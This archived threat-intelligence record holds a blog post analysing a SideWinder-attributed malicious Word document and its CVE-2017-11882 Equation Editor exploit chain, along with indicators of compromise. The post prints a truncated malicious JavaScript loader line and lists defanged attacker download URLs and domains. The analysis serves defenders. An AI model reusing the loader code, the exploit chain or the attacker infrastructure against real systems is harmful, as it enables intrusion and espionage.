{ "id": "044f4c51-039e-4758-a922-d4e8720d0800", "created_at": "2026-04-06T00:14:07.801913Z", "updated_at": "2026-04-10T03:37:20.277185Z", "deleted_at": null, "sha1_hash": "ec8f2ac3fba54c46a0da97686bf17ab381efe68f", "title": "404 — File still found", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2056546, "plain_text": "404 — File still found\r\nBy DCSO CyTec Blog\r\nPublished: 2024-01-18 · Archived: 2026-04-05 16:54:05 UTC\r\nIn early February 2022, we came across a tweet from ShadowChasing1 identifying a SideWinder-related word\r\ndocument which referenced a template URL. In this article, we share our insights from investigating the file and\r\nother infrastructure connected to it.\r\nhttps://twitter.com/ShadowChasing1/status/1490984172797984770\r\nThis blog was authored by Axel Wauer\r\nFirst Look\r\nThe file mentioned in the tweet is named ‘Briefing on Ongoing\r\nProjects.docx’(eeeb99f94029fd366dcde7da2a75a849833c5f5932d8f1412a89ca15b9e9ebb7) and is available on\r\nVirusTotal and on our GitHub.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 1 of 13\n\nContent of ‘Briefing on Ongoing Projects.docx’ as seen on VirusTotal.\r\nThe document itself contains little information and appears empty aside from the address block. However, a\r\ndeeper inspection of the document structure reveals that the document loads an RTF template from\r\nhttps://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtf which we assume\r\nrepresents the next stage of the attack. At the time of our analysis, this file was not available under the given URL\r\nanymore, yet the domain still resolved to 185.255.17.46 .\r\nAfter unpacking the document structure, we could locate the suspicious URL under the path word/\r\n_rels\\document.xml.rels. It generally refers to relations and in this case aims to download a RTF template as\r\nshown in the code snippet below:\r\n# word/_rels\\document.xml.rels\u003cRelationship Id=\"fid990\"Type=\"http://schemas.openxmlformats.org/offic\r\nWith the URL being dead, we went back to VirusTotal to use the graph feature. It indicates that file.rtf indeed was\r\ndownloaded and provides the file’s\r\nhash,1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a. Based on this, we continue our\r\nanalysis by looking into file.rtf.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 2 of 13\n\nVirusTotal contact graph of ‘Briefing on Ongoing Projects.docx’\r\nfile.rtf(1)\r\nOur next step was now to analyse the .rtf file with the hash\r\n1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a available on VirusTotal and on our\r\nGitHub.\r\nUnfortunately, the content of the RTF file seems not to be malicious as it is only one line with less than ten\r\ncharacters. The complete content of the file is shown below:\r\n{\\rtf1 }\r\nThe file itself was first uploaded to VirusTotal on 2021–11–03 and had therefore already been online for quite\r\nsome time. Yet it appears to be some kind of placeholder file. Checking the listed relations of this file on\r\nVirusTotal clearly shows its relation to the analysed document:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 3 of 13\n\nRelation between the file.rtf and as malicious marked domains on VirusTotal\r\nAll domains listed in this screenshot above follow the same path pattern which can be described as:\r\n\u003c…\u003e /0/0/0/m/files-\u003chex_data\u003e/file.rtf\r\nFrom this information, we assume that the original malicious RTF file was replaced after the initial delivery with a\r\nplaceholder file. This file is small in size and not rich in content, yet it is unique enough to lead to related attacker\r\ndomains on VirusTotal since it’s not a default file.\r\nReviewing all related domains on the list revealed that the domain dgmp-paknavy.mod-pk[.]com has relations to\r\nanother RTF file (4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588) available on\r\nVirusTotal, which potentially could have been the file.rtf before replacement.\r\nfile.rtf(2)\r\nAs mentioned above, our next step aims to analyze another RTF file we will refer to as file.rtf(2) with the hash\r\n4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588. The file is available on VirusTotal\r\nand on our GitHub.\r\nA first look at the file is promising, as the file size is 66.21 KB and was initially submitted to VirusTotal on 2022–\r\n02–08. The file is indeed a valid Rich Text Format file and contains the three sections listed in the screenshot\r\nbelow.\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 4 of 13\n\nThe RTF file contains three sections\r\nPress enter or click to view image in full size\r\nrtfobj reveals more information\r\nAs soon as we extracted the first object (1.a ,\r\nc2809dcc935ed3c7923f1da67d1c5dddc4ece2353a4c0eab8c511a14fa7e04c1) we noticed, that the hash was\r\nmentioned by another researcher as part of the malicious document on Twitter, reinforcing our assumption of this\r\nbeing the original file.rtf.\r\nBeside 1.a, the RTF file contains another embedded object which will be triggered via \\objupdate when the\r\ndocument is loaded. This indicates the next execution step after ‘Briefing on Ongoing Projects.docx’ has reloaded\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 5 of 13\n\nthe RTF file.\r\nPress enter or click to view image in full size\r\nRaw view on embedded object triggered via \\objupdate\r\nThe triggered code attempts to execute the embedded Equation Editor object which has known vulnerabilities. The\r\nCVEs of these vulnerabilities are CVE-2017-11882(FONT), CVE-2018-0798(MATRIX) and CVE-2018-\r\n0802(FONT) as mentioned here and here.\r\nThe CVE listed for file.rtf(2) on VirusTotal is CVE-2017–11882, which indicates code execution based on\r\nunchecked font name input length.\r\nTo verify this claim, we have created a 010 Editor template to parse the embedded object based on the protocol\r\ndescription of OLE objects and MTEF objects. We share the template on our GitHub page along with the analysis\r\nfiles. The parser now allows us to follow the execution flow further by extracting the initial exploit code contained\r\nin the FONT name section of the object.\r\nPress enter or click to view image in full size\r\nParsed OLE/MTEF object with overflowing FONT name containing shellcode (red)\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 6 of 13\n\nAfter extracting and converting the shellcode via CyberChef, it becomes clear that the exploit code abuses the\r\nFONT name field. The exploit code then (code in CyberChef) triggers a loop (code in CyberChef) to decrypt\r\nembedded xor-encrypted JavaScript code. The xor key used in this case is 12.\r\nThe assembler code used for the exploit coincides with findings in this article here. The disassembly for the\r\nexploit and the xor decryption is shown below:\r\nCyberChef disassembly of the exploit code\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 7 of 13\n\nCyberChef disassembly of XOR loop\r\nThe decrypted JavaScript code listed below executes the file 1.a, which is dropped to a temp path when the RTF is\r\nloaded:\r\njavascript:eval(\"sa=ActiveXObject;ab=new sa(\\\"Scripting.FileSystemObject\\\");eval(ab.OpenTextFile(ab.G\r\nThe 1.a file is stored on disc in obfuscated form in order to hinder automated analysis. We share the obfuscated\r\nand deobfuscated file on GitHub.\r\nOn execution, the file deserialises an object, identifies existing Antivirus software and attaches them as variable to\r\na URL. The deserialised object will be invoked by calling the function “work” with two slightly different URLs,\r\nwhich we assume are used for downloading the next stage and error reporting.\r\nGet DCSO CyTec Blog’s stories in your inbox\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 8 of 13\n\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nThe included URLs are listed below:\r\nNext stage:\r\nhttps://dgmp-paknavy.mod-pk[.]com/14325/1/10/3/1/1/1865884360/uAiXa3upVnbI8GnagA2EgfGUnQxzUvVIEq4r3YT\r\nhttps://dgmp-paknavy.mod-pk[.]com/14325/1/10/3/3/0/1865884360/uAiXa3upVnbI8GnagA2EgfGUnQxzUvVIEq4r3YT\r\nNext, we extracted the deserialised .NET object\r\n(95f99d5da860ece23154ddef0bb289797dc2bd711034ce39c1ac85b9305919cb) and decompiled it with ILSpy.\r\nUnsurprisingly, this file was obfuscated as well, so we provide the obfuscated and the deobfuscated file on\r\nGitHub, too.\r\nIn general, the program evaluates the previously discovered Antivirus software and reports it if available. If\r\n“work” is called with a local file path, the script executes the contained Windows shell commands, embedding it\r\ninto a WshShell JavaScript object which it executes via mshta.exe. If “work” is called with a URL, as seen in our\r\nsample, a file containing assembly commands will be downloaded. It is then decrypted with a 32 bit key\r\nprepended to the specific file and executed. Notably, there’s also error reporting capabilities. The program reports\r\nexceptions at different positions throughout the execution of the program by appending an exception message to\r\nthe URL before calling them.\r\nDuring our analysis and validation, we found related work analysing similar malicious documents which\r\ncorrespond to our sample. The article dissects the samples by explaining it in depth and validates the attribution\r\nclaim made in the initial tweet of our article. Based on the structure and used vulnerability this file seems to be\r\nrelated to the Royal Road v3 framework as mentioned here.\r\nAt this point, there were no clear indicators or hashes of the next execution stage, and we therefore stopped\r\nfollowing the execution path further.\r\nAttack Chain\r\nHere, we summarise the execution flow of the file. The malicious document will be opened by the victim and a\r\nRTF template file is then loaded. This RTF file contains the remote code execution exploit CVE-2017–11882\r\nwhich abuses a FONT name vulnerability in the Equation Editor triggered via an embedded Equation Editor\r\nobject. The exploit executes a JavaScript file, previously written to disk through the RTF template, which then\r\nexecutes .NET code. This file downloads another stage which is no longer available online. The ability to execute\r\nan already existing local file is implemented in the code, but not used in this process flow.\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 9 of 13\n\nMalicious execution flow of the document\r\nPlaceholder files\r\nAs mentioned before, the nearly empty file.rtf(1) we initially found wasn’t very useful in terms of content. We\r\nassume that the original file on the server was removed to protect the following stage by replacing it with a\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 10 of 13\n\nplaceholder file. Yet, because the file is custom, it can be utilised as identifier and establish a relationship between\r\nthe attacks. In this case, we are able to link eight domains as shown below.\r\nPress enter or click to view image in full size\r\nVirusTotal indicates communication between maldocs and the placeholder file\r\nBased on the given relation on VirusTotal, the URLs of these eight domains all exhibit the same path pattern ( \u003c…\r\n\u003e /0/0/0/m/files-\u003chex_data\u003e/file.rtf) which supports the assumption of a possible connection between them. We\r\nlist the domains below.\r\nhttp://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtfhttp://dgpr.paknvay-pk[\r\nA quick check of the domains led to related posts attributing the domains to the same APT, shown in the list\r\nbelow.\r\n+-----------------------+---------------------------+\r\n| Attribution source | Domains |\r\n+-----------------------+---------------------------+\r\n| @_jsoo_ | bahariafoundation[.]live |\r\n+-----------------------+---------------------------+\r\n| @uslss_etr | cvix[.]live |\r\n+-----------------------+---------------------------+\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 11 of 13\n\n| Checkpoint Research | kpt-pk[.]net |\r\n+-----------------------+---------------------------+\r\n| @ShadowChasing1 | ksew[.]org |\r\n+-----------------------+---------------------------+\r\n| @ShadowChasing1 | ministry-pk[.]net |\r\n+-----------------------+---------------------------+\r\n| @uslss_etr | mod-pk[.]com |\r\n+-----------------------+---------------------------+\r\n| @JVPv5sIM3eFmGyi | moma-pk[.]org |\r\n+-----------------------+---------------------------+\r\n| @uslss_etr | paknvay-pk[.]net |\r\n+-----------------------+---------------------------+\r\nIn conclusion, this placeholder file creates a relationship between several different attacks, supporting the\r\nattribution made by other researchers.\r\nIn addition, we checked the validity period of the TLS certificates on crt.sh for the domains in question. The\r\ngraphic below illustrates the validity periods of the relevant TLS certificates, and even though we can’t be sure\r\nwhen exactly the attacks were carried out, we can at least narrow down the time frame.\r\nPress enter or click to view image in full size\r\nValidity span of TLS certificates for each identified domain\r\nConclusion\r\nA sample attributed to SideWinder was published on Twitter. We analysed the sample and followed related IoCs as\r\nfar as possible. Along this analysis, we found related work verifying the file structure and attribution. We also\r\nnoticed that different SideWinder samples downloaded the same nearly empty RTF file which we assume acts as\r\nplaceholder file after the original payload was delivered. This placeholder file itself is not considered a default file\r\nwhich allowed us to identify related domains of this campaign.\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 12 of 13\n\nAll extracted and deobfuscated files can be downloaded from our GitHub repository DCSO CyTec.\r\nIoCs\r\nWe provide a MISP event on our GitHub.\r\n### SHA256## Document from Tweet\r\neeeb99f94029fd366dcde7da2a75a849833c5f5932d8f1412a89ca15b9e9ebb7## Placeholder RTF Template\r\n1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a## Malicious RTF Template\r\n4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588## Malicious embedded JavaScript\r\nc2809dcc935ed3c7923f1da67d1c5dddc4ece2353a4c0eab8c511a14fa7e04c1## Malicious embedded .Net file\r\n95f99d5da860ece23154ddef0bb289797dc2bd711034ce39c1ac85b9305919cb## Documents linked to RTF placeholde\r\ncb933361cd6c26ca61c441a40da394a505086f572fd7e9bd425bf086adf50edc\r\n6a00b6f20123258fb8db9ccb3e6b07947475da3d8e797cdcfe01ce8144139e38\r\n146e2c51cd7c904e0eeb641daa6ee956e80b48b198b9d2a9fd9b92b68399f9d1\r\nd3a0b7c5a1eafbf7d381b6ee064083496476163da5dfed53096fac36c2b30738\r\nf09ed1c47f61e918fd67e66c342eb45476c6a5bb8367a24dbea63a1b8fd979d3\r\nf765b0b6e4a34eb95c6f0ddf058bc88d5ef9ec2b11a5f3504d1673f4f69aceca\r\n60017e193cfd0df017eb8d0cc5f4bfc49593d90430a3e89a287f6afb83672236### URLshttp://dgmp-paknavy.mod-pk[.\r\nhttp://dgpr.paknvay-pk[.]net/5330/1/1330/2/0/0/0/m/files-4d9d0395/file.rtf\r\nhttp://mohgovsg.bahariafoundation[.]live/5320/1/13/2/0/0/0/m/files-1ddf5195/file.rtf\r\nhttps://cabinet-gov-pk.ministry-pk[.]net/14300/1/1273/2/0/0/0/m/files-68ebf815/file.rtf\r\nhttps://careitservices.paknvay-pk[.]net/5359/1/4586/2/0/0/0/m/files-266ad911/file.rtf\r\nhttps://defencelk.cvix[.]live/3023/1/54082/2/0/0/0/m/files-0c31ed2d/file.rtf\r\nhttps://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtf\r\nhttps://dgpr.paknvay-pk[.]net/5330/1/1330/2/0/0/0/m/files-4d9d0395/file.rtf\r\nhttps://mailaplf.cvix[.]live/2968/1/50390/2/0/0/0/m/files-7630e91a/file.rtf\r\nhttps://mohgovsg.bahariafoundation[.]live/5320/1/13/2/0/0/0/m/files-1ddf5195/file.rtf\r\nhttps://sppc.moma-pk[.]org/5281/1/4265/2/0/0/0/m/files-d2608a99/file.rtf\r\nhttps://srilankanavy.ksew[.]org/5471/1/1101/2/0/0/0/m/files-cd6e6dbd/file.rtf\r\nhttp://maritimepakistan.kpt-pk[.]net/5434/1/3694/2/0/0/0/m/files-ce32ed85/file.rtf\r\nhttps://maritimepakistan.kpt-pk[.]net/5434/1/3694/2/0/0/0/m/files-ce32ed85/file.rtf### Domainsbaharia\r\ncvix[.]live\r\nkpt-pk[.]net\r\nksew[.]org\r\nministry-pk[.]net\r\nmod-pk[.]com\r\nmoma-pk[.]org\r\npaknvay-pk[.]net\r\nSource: https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nhttps://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c" ], "report_names": [ "404-file-still-found-d52c3834084c" ], "threat_actors": [ { "id": "b740943a-da51-4133-855b-df29822531ea", "created_at": "2022-10-25T15:50:23.604126Z", "updated_at": "2026-04-10T02:00:05.259593Z", "deleted_at": null, "main_name": "Equation", "aliases": [ "Equation" ], "source_name": "MITRE:Equation", "tools": null, "source_id": "MITRE", "reports": null }, { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "d0c0a5ea-3066-42a5-846c-b13527f64a3e", "created_at": "2023-01-06T13:46:39.080551Z", "updated_at": "2026-04-10T02:00:03.206572Z", "deleted_at": null, "main_name": "RAZOR TIGER", "aliases": [ "APT-C-17", "T-APT-04", "SideWinder" ], "source_name": "MISPGALAXY:RAZOR TIGER", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "6b9fc913-06c6-4432-8c58-86a3ac614564", "created_at": "2022-10-25T16:07:24.185236Z", "updated_at": "2026-04-10T02:00:04.893541Z", "deleted_at": null, "main_name": "SideWinder", "aliases": [ "APT-C-17", "APT-Q-39", "BabyElephant", "G0121", "GroupA21", "HN2", "Hardcore Nationalist", "Rattlesnake", "Razor Tiger", "SideWinder", "T-APT-04" ], "source_name": "ETDA:SideWinder", "tools": [ "BroStealer", "Capriccio RAT", "callCam" ], "source_id": "ETDA", "reports": null }, { "id": "173f1641-36e3-4bce-9834-c5372468b4f7", "created_at": "2022-10-25T15:50:23.349637Z", "updated_at": "2026-04-10T02:00:05.3486Z", "deleted_at": null, "main_name": "Sidewinder", "aliases": [ "Sidewinder", "T-APT-04" ], "source_name": "MITRE:Sidewinder", "tools": [ "Koadic" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434447, "ts_updated_at": 1775792240, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ec8f2ac3fba54c46a0da97686bf17ab381efe68f.pdf", "text": "https://archive.orkl.eu/ec8f2ac3fba54c46a0da97686bf17ab381efe68f.txt", "img": "https://archive.orkl.eu/ec8f2ac3fba54c46a0da97686bf17ab381efe68f.jpg" } }